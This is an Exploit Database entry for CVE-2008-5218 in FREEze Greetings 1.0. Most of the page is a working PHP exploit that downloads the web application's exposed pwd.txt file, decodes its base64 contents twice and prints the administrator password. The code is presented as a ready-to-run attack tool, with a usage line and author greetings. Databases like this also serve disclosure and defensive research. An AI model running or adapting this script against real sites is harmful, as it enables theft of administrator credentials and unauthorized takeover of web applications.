Exploit Database - Logo

FREEze Greetings 1.0 - Remote Password Retrieve Exploit

EDB-ID: 7140 Author: cOndemned Published: 2008-11-17
CVE: CVE-2008-5218 Type: Webapps Platform: PHP
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: N/A
« Previous Exploit Next Exploit » 
<?php

/**
* FREEze Greetings 1.0 Remote Password Retrieve Exploit
* Exploit by cOndemned 
*
* Greetz : suN8Hclf, 0in, m4r1usz, str0ke, rtgn, doctor, sid.psycho [...]
* Special thx to ZaBeaTy for developing such a sexy regexp ;) Thx m8 
*/

echo <<< Header

[~] FREEze Greetings 1.0 Remote Password Retrieve Exploit
[~] Exploit by cOndemned [ Prints decoded admin password ]

Header;

if($argc != 2) printf("[~] Usage : php %s <target_with_path>\r\n\r\n", $argv[0]) and exit;

$out = (preg_match('!^([^ ]+)$!sei', file_get_contents($argv[1] . '/pwd.txt'), $r) && preg_match('!^([^\|\|]+)\|\|!sei', base64_decode($r[1]), $pass))
	? sprintf("Password : %s", base64_decode($pass[1])) : 'Exploitation failed';

printf("[~] %s \r\n\r\n", $out);

?>

# milw0rm.com [2008-11-17]

Related Exploits

Trying to match CVEs (1): CVE-2008-5218
Trying to match OSVDBs (1): 49883
Other Possible E-DB Search Terms: FREEze Greetings 1.0,  FREEze Greetings
Date D V Title Author
No matches
Menu